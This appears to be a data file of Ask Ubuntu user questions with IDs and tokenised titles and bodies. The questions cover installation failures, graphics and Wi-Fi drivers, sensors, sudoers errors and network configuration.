459088	how can i edit the windows registry through ubuntu ?	recently i downloaded a program on windows , and i think it installed a key-logger . i quickly went to ubuntu , and deleted the program files from there . i am quite sure that it is gone , but i must have deleted some file that is associated to the windows login ( which i do n't know how , since i only deleted the the program 's folder from the prgramfilesx86 directory ) , because now when i login to windows , it says `` loging in '' then it flashes grey , then logs out . i looked up answers to this question , and it seemed like you needed to edit the windows registry . i was wondering if anyone could tell me how to do this from ubuntu . i saw a post that said you needed to install , but their instructions on how to edit the actual registry did not work . i was wondering if anyone could help me fix my problem .
459089	edubuntu 14.04 install , no unity	i have been trying to install edubuntu 14 04 on to our hp workstation xw4200 , intel pentium , 4 spu 3.2ghz . i am using a usb boot drive which i created following instructions on edubuntu download section . the installation seems to go fine but upon restart , screen art comes up once and then goes black . i can force a terminal and after some research suspected my nvidia driver.ven the problem . i purged nvidia driver and installed the one recommended but now it brings up the screen but no further . my video card is nvdidia nv37gl quadro pci-e series rev a2 i have gone to terminal and tried the following sudo apt-get update sudo apt-get -- reinstall install ubuntu-desktop sudo apt-get install unity sudo shutdown -r now i have also tried the solutions outlined here : upgrade from 13.10 to 14.04 no unity dash for default user special compiz config updated i have removed all nvidia drivers and it works , slowly and with really low resolution . i would love a solution to get the resolution back and full functionality .
459091	loading new ubuntu on old hp	trying to load ubuntu 14.04 on an older hp ze4500 using a flash drive as the loading device . the computer has recently had a full wipe done on it . it begins fine then freezes less than halfway thru several attempted installations , never actually reaching the `` install '' menu . i have tried several variations including disabling the apic via the grub screen . any suggestions plz ?
459094	install gnome 3.10 ubuntu 14.04	i heard that gnome 3.10 will be available in ubuntu 14.04 but when i looked in the software centre gnome 3.8 was offered.is there a way to install gnome 3.10 without adding ppa in trusty ? edit i tried installing through the terminal and gnome 3.10 was installed ( gnome shell and desktop ) .i cheked inside the software centre and gnome was n't marked as installed .
459095	eclipse java perspective not showing after upgrade to 13.10	i upgraded my ubuntu from 13.04 to 13.10 , eclipse was working like a charm , but after the upgrade , the java perspective is not visible any more , moreover , i can not create a java project . any idea why this happened , i tried to rename the java ~/.eclipse to ~/.eclipse.old but this did n't help . thank you
459098	grub/initramfs teaser with ide hd	i have installed ubuntu 13.10 onto an old pc . the pc has 2 ide drives arranged in a master/slave fashion . i was not paying enough attention when i installed the boot partition onto the slave drive . as a result when i boot up the machine i either get an 'operating system not found ' error , or if i flip the drives around in the bios i get thrown to a initramfs session which informs me that the boot partition could not be found . the machine will not boot off of cdrom/dvd . in order to install ubuntu i had to do a wubi install to force the cdrom boot up of the live-cd . the machine does have options for both cdrom and 'detachable ' device boot options in bios , but they do not seem to have any effect . similarly , efforts to obtain booting from the usb have failed . this was a new install , so there is nothing to be lost . i would be completely happy with a forced install . is there someway to use grub or initramfs to install off of cdrom or usb ? any ideas ?
459100	run adobe cc programs in wine ?	is it possible to install the creative cloud on wine ? i tried to run it using default settings and it crashes instantly . was hoping someone got this working . right now i dual boot win and ubuntu , and my whole workflow is so much faster , except when i have to do video editing and i need both after effects and premier pro . both of which are on my windows boot . i tried using open shot , and its too buggy , not enough features , and crashes my desktop when trying to do anything with it .
459101	12.04 wo n't reboot following update	dear ubuntu community , i 've installed lts 12.04 recently as xp extented support ceased . i 've used a cd for the installation as it seems my pc can not boot from usb . after 2 weeks of enjoying ubuntu , i 've updated some programs ( the ones suggested by the update manager ) and installed 2 image/photo editors ( darktable and another one ) . the update manager asked me to reboot , which i have done . since then , it 's impossible to reboot . the boot goes at different stage everytime , sometimes it goes as far as the pixelated 12.04 screen with the 4 dots showing some progress . everytime it displays a few lines of text that do not make sense to me and present me with the cursor , but i ca n't type anything . also , my cd drive has died so i ca n't read the installation cd . is there a way i can fix this without having to replace my cd-rom drive ? thanks for your help . thorodin ps : i only have ubuntu 12.04 installed . no dual boot .
459102	how can i see all the aplications and to select which one should be in start up ?	i would like to include in start up applications some additional programs , but i donât know the launching command . is it any simple way to see all the installed programs and to select the ones to be included in start up ?
459104	nvidia gets a black screen after a few seconds on a game	i have a geforce gt 630 and ubuntu 14.04 . i installed the driver using : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo sudo apt-get install nvidia-331 it works fine , but a few seconds after i start a game in steam , i get a black screen , while the music continues to play . i tried this , `` screen blanks/monitor turns off '' section ( i use a dvi to vga adapter ) . my xorg.config currently : did i do anything wrong ? are those xorg.conf.save , and xorg.conf.save.1 , supposed to exist ? well it is not steam , i tried the same game without steam and got the same problem , i have tried also tried strife and got this problem on the launcher ! is not even full screen .
459105	ubuntu 14.04 dvd drive wo n't work	i just got a new dvd drive that i know works because it live boots another distribution . when i put a dvd into the drive it repeatedly tries and fails to spin up , and ubuntu does n't recognize that there is a dvd in the drive . here is the lshw output with : no dvd in the drive : *-cdrom description : dvd reader product : cdw/dvd ts-l462c vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : to10 capabilities : removable audio cd-r cd-rw dvd configuration : ansiversion=5 status=nodisc with a dvd in the drive : *-cdrom description : dvd reader product : cdw/dvd ts-l462c vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : to10 capabilities : removable audio cd-r cd-rw dvd configuration : ansiversion=5 status=nodisc what should i do to get it running correctly ?
459108	sensors-detect does not discover all sensors on lenovo ideapad y510p	my sensors readings never read values for next two sensors : acpitz-virtual-0 always show 0 degrees for temp1 thinkpad-isa-0000 always show 0 rpm drakone @ b4da55 : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +0.0°c ( crit = +127.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 0 : +50.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +46.0°c ( high = +84.0°c , crit = +100.0°c ) core 2 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 3 : +45.0°c ( high = +84.0°c , crit = +100.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 0 rpm sensors-detect finds core-temp and family `national semiconductor/ite unknown chip with id 0x8586 drakone @ b4da55 : ~ $ sudo sensors-detect # sensors-detect revision 6170 ( 2013-05-20 21:25:22 +0200 ) # system : lenovo 20217 [ lenovo ideapad y510p ] ( laptop ) # board : lenovo viqy0y1 this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : module cpuid loaded successfully . silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no amd family 16h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... yes found unknown chip with id 0x8586 some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : using driver `i2c-i801 ' for device 0000:00:1f.3 : intel lynx point ( pch ) module i2c-i801 loaded successfully . module i2c-dev loaded successfully . next adapter : nvidia i2c adapter 0 at 1:00.0 ( i2c-0 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 1 at 1:00.0 ( i2c-1 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 2 at 1:00.0 ( i2c-2 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 7 at 1:00.0 ( i2c-3 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 8 at 1:00.0 ( i2c-4 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 11 at 1:00.0 ( i2c-5 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 0 at 7:00.0 ( i2c-6 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 1 at 7:00.0 ( i2c-7 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 2 at 7:00.0 ( i2c-8 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : smbus i801 adapter at 6000 ( i2c-9 ) do you want to scan it ? ( yes/no/selectively ) : client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) probing for `edid eeprom ' ... no client found at address 0x52 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok what i need to do to get proper sensor readings in my ubuntu 14.04 ( cpu fan speed , board temperature ... ) ? thanks !
459113	problem with ghostscript 9.10 in ubuntu 14.04	i am facing a problem with ghostscript in ubuntu 14.04 . it is showing the below mentioned error when i try to open some .eps file though the same .eps file is opening in ubuntu 12.04 correctly . i think ghostscript 9.10 has some bug and downgrade of ghostscript 9.10 may help . please suggest some way to fix the bug . gs file.eps give the below error : error : /undefined in r ! : rb^ operand stack : execution stack : % interp_exit .runexec2 -- nostringval -- -- nostringval -- -- nostringval -- 2 % stopped_push -- nostringval -- -- nostringval -- -- nostringval -- false 1 % stopped_push 1916 1 3 % oparray_pop 1915 1 3 % oparray_pop -- nostringval -- 1899 1 3 % oparray_pop 1787 1 3 % oparray_pop -- nostringval -- % errorexec_pop .runexec2 -- nostringval -- -- nostringval -- -- nostringval -- 2 % stopped_push -- nostringval -- dictionary stack : -- dict:1171/1684 ( ro ) ( g ) -- -- dict:0/20 ( g ) -- -- dict:81/200 ( l ) -- -- dict:81/128 ( l ) -- -- dict:21/32 ( l ) -- current allocation mode is local last os error : no such file or directory current file position is 1108460 gpl ghostscript 9.10 : unrecoverable error , exit code 1
459114	locked andriod jelly bean 4.2	i spoke to a sales rep about a google nexus 10 and he said that the current os ( andriod jelly bean 4.2 ) was 'locked ' and could not be upgraded . he said that the nexus 7 , just as the 10 started out with an unlocked os but about 6 months before a new release they also became locked . this leads him to believe that there is a new release of android coming up soon and that is why the nexus 10 is now shipping with a locked os . i personally am not too concerned with the android os being not upgradable . what does concern me is whether or not i will be able to install other oss such as ubuntu onto this tablet . does anyone know if this 'lock ' will affect my ability to install ubuntu ?
459115	corrupted sudoers file , ubuntu 12.04	my /etc/sudoers file is somehow corrupted and all the users who have sudo privileges are unable to execute any command with sudo prefix to the command ! sudo : parse error in /etc/sudoers.d/readme near line 1 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin i have tried almost all the solutions suggested in previous similar questions like rebooted the system many times tried to modify the file /etc/sudoers.d/readme but was unable to do so . in recovery mode , mounted the file system with rw and tried to modify the mentioned file but was unsuccessful pkexec bash ... .. still no use the file line in /etc/sudoers.d/readme is infact an empty line . can you please guide me ! thanks .
459119	ubuntu 14.04 install	receiving error message when installing on older hp ze4500 . applied boot function nomodeset and rcvd following : `` ali mixer 1 creating error . ali15x3 not detected , module not inserted . '' can anyone advise how to proceed ? thank you
459123	can someone please clear up the haziness regarding security in ubuntu and the other recognised distros ?	i was using ubuntu , but after updating to 14.04 lts the unity desktop did not perform particularly well . so after research , i switched to xubuntu , a recognised version of ubuntu running the xfce desktop environment . do both of these distros actually have anti-virus and anti-malware etc . built in , plus the programmable firewall , or are they just so called 'resistant ' to viruses , because of supposed lack of ubuntu specific viruses . i have looked through many articles on ask ubuntu as well as other blogs , and all they seem to do is contradict . please help ! any help is greatly appreciated !
459124	fan does not work on dell xps 13 developer edition with 14.04	after updating my dell xps 13 developer edition to ubuntu 14.04 the fan is not working . the i8kutils are installed but i8kmon does not work . it returns * starting dell fan/cpu-temperature monitor i8kmon [ fail ]
459125	dell wifi not working after 14.04 install	below is wireless related info extracted from other forum advice . looks like a kernel issue but i 'm clueless how to solve . thanks for any advice . # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux john-vostro-1400 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux # # # # # lspci # # # # # 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5906m fast ethernet pci express [ 14e4:1713 ] ( rev 02 ) subsystem : dell device [ 1028:0227 ] kernel driver in use : tg3 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card [ 1028:0007 ] kernel driver in use : wl # # # # # lsusb # # # # # bus 002 device 002 : id 05a9:2640 omnivision technologies , inc. ov2640 webcam bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search ph.cox.net # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.105 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # ssb 51854 1 wl 3999690 1 lib80211 14040 1 wl cfg80211 409394 1 wl # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/ssb/ssb.ko license : gpl description : sonics silicon backplane driver srcversion : 3de188310f77c566c2e8cb3 alias : pci : v000014e4d00004350sv*sd*bc*sc*i* alias : pci : v000014e4d0000432csv*sd*bc*sc*i* alias : pci : v000014e4d0000432bsv*sd*bc*sc*i* alias : pci : v000014e4d00004329sv*sd*bc*sc*i* alias : pci : v000014e4d00004328sv*sd*bc*sc*i* alias : pci : v000014e4d00004325sv*sd*bc*sc*i* alias : pci : v000014e4d00004324sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d6sv*sd*bc*sc*i* alias : pci : v000014e4d00004322sv*sd*bc*sc*i* alias : pci : v000014e4d00004321sv*sd*bc*sc*i* alias : pci : v000014e4d00004320sv*sd*bc*sc*i* alias : pci : v000014e4d00004319sv*sd*bc*sc*i* alias : pci : v000014a4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004315sv*sd*bc*sc*i* alias : pci : v000014e4d00004312sv*sd*bc*sc*i* alias : pci : v000014e4d00004311sv*sd*bc*sc*i* alias : pci : v000014e4d00004307sv*sd*bc*sc*i* alias : pci : v000014e4d00004306sv*sd*bc*sc*i* alias : pci : v000014e4d00004301sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > :96 : dc:92 : b0:1d:75:9d:3e:85:62 : ea:32 : a1 : c7 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/updates/dkms/wl.ko license : mixed/proprietary srcversion : ff25fe784dc6bdff69dafcb alias : pci : v*d*sv*sd*bc02sc80i* depends : cfg80211 , lib80211 vermagic : 3.13.0-24-generic smp mod_unload modversions 686 parm : wl_txq_thresh : int parm : oneonly : int parm : piomode : int parm : instance_base : int parm : nompc : int parm : intf_name : string # # # # # modules # # # # # lp # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x14e4:0x1713 ( tg3 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # # # # # dmesg # # # # # [ 16.289874 ] wl : module license 'mixed/proprietary ' taints kernel . [ 16.302998 ] wl : module verification failed : signature and/or required key missing - tainting kernel [ 16.384641 ] wl driver 6.30.223.141 ( r415941 ) failed with code 21 [ 16.384690 ] modules linked in : snd_pcm dell_wmi videodev wl ( pof+ ) gpio_ich sparse_keymap snd_page_alloc snd_seq_midi nouveau ( + ) snd_seq_midi_event snd_rawmidi snd_seq r852 sm_common mxm_wmi snd_seq_device nand ttm snd_timer nand_ecc drm_kms_helper dell_laptop nand_bch lib80211 bch dcdbas drm snd r592 nand_ids soundcore psmouse mtd i2c_algo_bit cfg80211 memstick coretemp serio_raw lpc_ich wmi mac_hid video parport_pc ppdev lp parport firewire_ohci tg3 firewire_core ahci ptp libahci sdhci_pci crc_itu_t sdhci pps_core [ 16.384855 ] eip is at wdev_priv.part.9+0x3/0x5 [ wl ] [ 16.384986 ] [ < fc5589d7 > ] wl_cfg80211_detach+0xf7/0x100 [ wl ] [ 16.385042 ] [ < fc5513c3 > ] wl_free_if.isra.12+0x23/0xa0 [ wl ] [ 16.385097 ] [ < fc551a68 > ] wl_free+0x78/0x260 [ wl ] [ 16.385174 ] [ < fc551f5e > ] wl_pci_probe+0x30e/0x630 [ wl ] [ 16.385340 ] [ < f84e2017 > ] wl_module_init+0x17/0x1000 [ wl ] [ 16.385504 ] eip : [ < fc558fb6 > ] wdev_priv.part.9+0x3/0x5 [ wl ] ss : esp 0068 : f2cadbbc # # # # # # # # # # wireless info end # # # # # # # # # # # #
459126	'ifconfig wlan0 down ' does n't work . i ca n't turn off wireless	i am trying to turn off wireless and since the wicd button 'switch off wi-fi ' does n't work i am forced to use the ifconfig command , i type sudo ifconfig wlan0 down and nothing happens . i ran it months ago and it worked but not now .
459127	terminator terminal emulator	my friend is using the terminator terminal emulator but after purging and reinstalling the settings are retained and the most useful features such as splitting horizontally and vertically are not binded to any keyboard . after changing the setting via the gui accessed via right clicking the terminal window the settings are not saved . how can we overcome this issue can a installed package conflict sort of thing caused this behaviour ? thanks
459128	my wi-fi auto connect after very long time ( about 5 minutes )	every time i start my computer i have to press twice f12 in order to deactivate and reactivate wi fi , and just after that my connection starts ( in a few seconds ) . is it a way to make it start automatically ? complementary info : if i donât press twice f12 , it takes about 5 minutes to auto-connect - as i just discovered complementary info : it seems that it was an illusion the fact that pressing twice f12 shorten the connection time . now every time i have to wait about 5 minutes . [ from op ] [ 336.774812 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 336.775300 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 338.236603 ] wlan0 : authenticate with dc:02:8e:63 : b9:10 [ 338.244241 ] wlan0 : send auth to dc:02:8e:63 : b9:10 ( try 1/3 ) [ 338.245846 ] wlan0 : authenticated [ 338.247641 ] wlan0 : associate with dc:02:8e:63 : b9:10 ( try 1/3 ) [ 338.250925 ] wlan0 : rx assocresp from dc:02:8e:63 : b9:10 ( capab=0x411 status=0 aid=1 ) [ 338.251034 ] wlan0 : associated [ 338.251059 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 2592.514180 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 2696.299008 ] wlan0 : authenticate with dc:02:8e:63 : b9:10 [ 2696.308971 ] wlan0 : send auth to dc:02:8e:63 : b9:10 ( try 1/3 ) [ 2696.319632 ] wlan0 : authenticated [ 2696.320512 ] wlan0 : associate with dc:02:8e:63 : b9:10 ( try 1/3 ) [ 2696.328968 ] wlan0 : rx assocresp from dc:02:8e:63 : b9:10 ( capab=0x411 status=0 aid=1 ) [ 2696.329083 ] wlan0 : associated [ 2696.329161 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
459131	dpkg error while installing anything	i 'm using ubuntu 12.04 . while trying to install anything using apt-get install i 'm getting the following error message : dpkg : warning : files list file for package `synaptic ' missing , assuming package has no files currently installed . ( reading database ... 65 % dpkg : unrecoverable fatal error , aborting : files list file for package 'indicator-sound ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) please help !
459132	wifi connectivity , eth0 and wlan0 interface ?	i do not have any problem in internet connectivity , both in terminal and in browser . few days earlier , i used to get a dynamic ipv4 address to eth0 from my isp and the interface used to be up and running . i do not know with what of my changes , the ip has migrated to wlan0 ? can you please explain , what exactly has happened ? it might help me further to understand the virtual nics funda ! can i consider the ip assigned to my pc is wlan0 ip ? ( layer 3 ip to connect to external world ) thanks . ubuntu 14.04 ! ifconfig eth0 eth0 link encap : ethernet hwaddr 00:1f:16:6c : b0:1f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) sriduth @ sriduth-hp-g60-notebook-pc : ~ $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:24:2c:3b : f8:79 inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:2cff : fe3b : f879/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:509669 errors:0 dropped:0 overruns:0 frame:0 tx packets:366807 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:715274922 ( 715.2 mb ) tx bytes:35266765 ( 35.2 mb ) sriduth @ sriduth-hp-g60-notebook-pc : ~ $ ping 192.168.1.102 ping 192.168.1.102 ( 192.168.1.102 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.102 : icmp_seq=1 ttl=64 time=0.075 ms 64 bytes from 192.168.1.102 : icmp_seq=2 ttl=64 time=0.064 ms ^c -- - 192.168.1.102 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.064/0.069/0.075/0.010 ms sriduth @ sriduth-hp-g60-notebook-pc : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 10.0.0.0 172.24.4.2 255.255.255.0 ug 0 0 0 br-ex 172.24.4.0 0.0.0.0 255.255.255.0 u 0 0 0 br-ex 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 sriduth @ sriduth-hp-g60-notebook-pc : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback sriduth @ sriduth-hp-g60-notebook-pc : ~ $ cat /etc/hosts 127.0.0.1 localhost sriduth-hp-g60-notebook-pc 127.0.1.1 sriduth-hp-g60-notebook-pc # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
459133	my installation does n't work	i downloaded the iso file and burnt it on a dvd using a iso burner ( which extracted the files from the iso and burnt them as though the cd was the iso ) and now popped it into the computer , rebooted using the ubuntu demo & install window but now my screen is black with only a few lines which read : -- -- -- -- busybox v.1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system -- -- -- - can anyone tell me what i did wrong ? i tried typing 'help ' but none of my keys do anything , after typing all this i noticed the screen had gone completely black and nothing responded so i force rebooted my pc . why does n't it boot from the cd ?
459136	is there an ubuntu shortcut for moving the cursor to the next word	i want something similar to windows ' ctrl+left/right arrow key . the effect is that the cursor moves to the beginning of the previous/next word . i did not find anything on the ubuntu documentation . any help ?
459137	ca n't execute files in windows partitions from ubuntu	i am using ubuntu 14.04 inside windows . i ca n't execute files in my windows ntfs partitions . it gives the following error : root @ ubuntu : /media/rakesh/data/my codes/test # ./a.out bash : ./a.out : permission denied i have tried solutions in the following threads but it does not work : how do i use 'chmod ' on an ntfs ( or fat32 ) partition ? why does ubuntu refuse to execute files from an ntfs partition ? .exe file permission fail
459138	launcher icons on sidebar stuck large	using either system settings , unity tweak tool , or compiz , i can not shrink my launcher icons , they were adjustable when i first installed ubuntu , but now after i restarted my computer , they seem to be stuck and not able to adjust anymore .
459139	how to copy or sync music on iphone 3gs on ubuntu 14.04 ?	iâm using ubuntu 14.04 and want to copy music to/on my iphone 3gs . i already installed the actual mobile device , but neither rhythmbox nor gmusicbrowser show my phone . only on gigolo i can see it , and transfer data , but the music i copy is not working on my phone . on amarok i get at least this information : termined mount-point path to /tmp/kde-cafer/amarok/imobiledevice_uuid_882ba1378fe4eb76e98ad6582dcad031c2247664 calling `ifuse `` -u '' `` 882ba1378fe4eb76e98ad6582dcad031c2247664 '' `` -ofsname=afc : //882ba1378fe4eb76e98ad6582dcad031c2247664 '' `` /tmp/kde-cafer/amarok/imobiledevice_uuid_882ba1378fe4eb76e98ad6582dcad031c2247664 '' ` with timeout of 10s command failed to start within timeout failed to mount iphone on /tmp/kde-cafer/amarok/imobiledevice_uuid_882ba1378fe4eb76e98ad6582dcad031c2247664 does anyone have an idea ? thanks
459140	why dhclient is still running when i choose static ip ?	i modify dhcp to static in /etc/network/interfaces ( like below ) . # the primary network interface auto eth0 iface eth0 inet static netmask 255.255.0.0 address 10.10.130.128 gateway 10.10.1.1 then restart the interface . $ sudo ifdown eth0 ; sudo ifup eth0 ... $ ifconfig eth0 link encap : ethernet inet addr:10.10.130.128 bcast:10.10.255.255 mask:255.255.0.0 so the new address kicks in . but dhcp is still there ? $ ps aux | grep dhc root ... dhclient3 -e if_metric=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0 is that normal ? if not , how to restart interface in static ip while stop dhcp at the same time ? thanks a lot .
